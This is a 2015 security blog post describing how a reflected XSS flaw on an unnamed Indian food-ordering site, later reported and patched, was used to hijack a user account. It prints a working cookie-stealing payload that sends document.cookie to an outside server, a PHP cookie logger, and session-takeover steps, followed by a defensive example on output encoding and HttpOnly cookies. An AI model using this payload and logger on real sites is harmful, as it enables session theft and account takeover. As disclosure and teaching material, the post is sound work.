Sunday 20 December 2015

User Account Hijack via XSS

Hi All,

This post is about how I managed to hijack a user account by exploiting an XSS vulnerability in one of the biggest online food companies in India. (I can't disclose the name, for obvious reasons.)


Cross-site scripting (XSS) is one of the most rampant and yet most underestimated web application vulnerabilities. Theft of cookies, personal data, authentication credentials and browser history are only some of its consequences: a script running in the victim's browser under the site's origin can do anything the logged-in user can. Recently, while working on web application vulnerabilities, I found an XSS vulnerability in one of the most popular online food ordering websites in India and, when I paired it with a little social engineering, I was able to take over a user account.


So here are the steps-


1- First, I discovered an XSS vulnerability in the website.

I can't show the PoC for it, as it has since been patched.

The goal was to get the user's session cookies, so I did the following two things:



  • Created a payload which extracts the user's cookies from the browser and sends them to a server I control (the img element fails to load, so its onerror handler runs and rewrites src to my URL with document.cookie appended).
Payload- "><img src='aa' onerror="this.src='http://mywebsite.com/anyfile.php?cookie='+document.cookie">
  • Developed a PHP script on my server to receive the stolen cookies and log them.
<?php
// Receives the cookie value sent by the onerror payload and appends it to a log file.
// $_GET replaces the long-deprecated $HTTP_GET_VARS, which was removed in PHP 5.4.
$cookie = isset($_GET["cookie"]) ? $_GET["cookie"] : "";
$steal = fopen("log.txt", "a");
fwrite($steal, $cookie . "\n");
fclose($steal);
?>


2- So the vulnerable link looked like this (shown unencoded for readability; the browser percent-encodes the payload when the link is followed):


https://thevulnerablesite.com/asian?vulnerableparameter="><img src='aa' onerror="this.src='http://mywebsite.com/anyfile.php?cookie='+document.cookie">


The next step is to lure the victim into clicking it.


Note: the victim must be logged in to the vulnerable website, i.e. a valid session cookie must already be stored in their browser. The cookie must also be readable from JavaScript; a cookie set with the HttpOnly flag is not exposed through document.cookie, and this payload would not capture it.

When the user clicked the malicious link sent by the attacker (here, me), the cookies were sent to my server.


3- Open your browser (I prefer Mozilla Firefox) and inject the captured cookies using any cookie editor, such as Cookie Manager.

Once that is done, reload the page and you are logged in as the victim, with full access to their account.






Through this XSS attack I gained full access to the victim's account: I could place orders, cancel them, change the registered mobile number and even make payments from the account.
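As an added example (not code from the original post, and not the affected site's code), here is a small Node.js model of what happened: a query parameter reflected into an HTML attribute without encoding, the payload from this post breaking out of that attribute, the attribute-encoding fix that neutralises it, and a helper showing which cookies document.cookie would actually hand to the payload. The function names, the sample Set-Cookie headers and the markup are assumptions for illustration.

```javascript
// Added example, not from the original post. Models the reflected XSS described
// above, the output-encoding fix, and what document.cookie exposes to a payload.
// Names and sample data below are assumptions for illustration.

// The cookie-stealing payload from the post: the broken <img> fires onerror,
// which points src at the attacker's server with document.cookie appended.
const PAYLOAD =
  `"><img src='aa' onerror="this.src='http://mywebsite.com/anyfile.php?cookie='+document.cookie">`;

// Vulnerable rendering (hypothetical): the parameter is echoed straight into an
// attribute value, so the leading `">` closes the attribute and the tag, and
// the rest of the payload becomes a live <img> element in the page.
function renderVulnerable(param) {
  return `<input type="text" name="q" value="${param}">`;
}

// Fix: encode every character that can change the meaning of an attribute
// value before reflecting it (& < > " ' /), so the payload stays inert text.
function escapeHtmlAttribute(s) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
  };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

function renderFixed(param) {
  return `<input type="text" name="q" value="${escapeHtmlAttribute(param)}">`;
}

// Crude check mirroring what you look for by eye: an <img> tag carrying an
// onerror handler that the template never wrote. A real test would load the
// markup in a browser and watch for the outbound request.
function containsLiveHandler(html) {
  return /<img[^>]*\bonerror=/i.test(html);
}

// What document.cookie returns for a set of Set-Cookie headers. Cookies flagged
// HttpOnly are never exposed to script, so the payload above cannot steal them;
// only the name=value pairs of the remaining cookies are visible.
function cookieVisibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .map((h) => h.split(";").map((p) => p.trim()))
    .filter((parts) => !parts.slice(1).some((a) => a.toLowerCase() === "httponly"))
    .map((parts) => parts[0])
    .join("; ");
}

// Constructed sample headers, not from the real site.
const SAMPLE_SET_COOKIES = [
  "sessionid=abc123; Path=/; Secure",          // readable by script -> stealable
  "csrftoken=xyz789; Path=/",                  // readable by script
  "auth=tok456; Path=/; Secure; HttpOnly",     // hidden from document.cookie
];

console.log("vulnerable:", renderVulnerable(PAYLOAD));
console.log("fixed:     ", renderFixed(PAYLOAD));
console.log("document.cookie would be:", cookieVisibleToScript(SAMPLE_SET_COOKIES));
```

Run it with node and compare the two rendered lines: in the vulnerable one the injected img element is real markup, in the fixed one it is inert text inside the attribute. The cookie helper is the defender's half of the story: the attack in this post could only work because the session cookie was readable from script, so marking it HttpOnly (together with encoding reflected output on the server) closes both halves of the attack.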

I reported this vulnerability to the organisation concerned on 1 August 2015 and it was patched in December.

That's all, folks, about this vulnerability.
Thanks.
-logicbomb

Suggestions and feedback are welcome. :)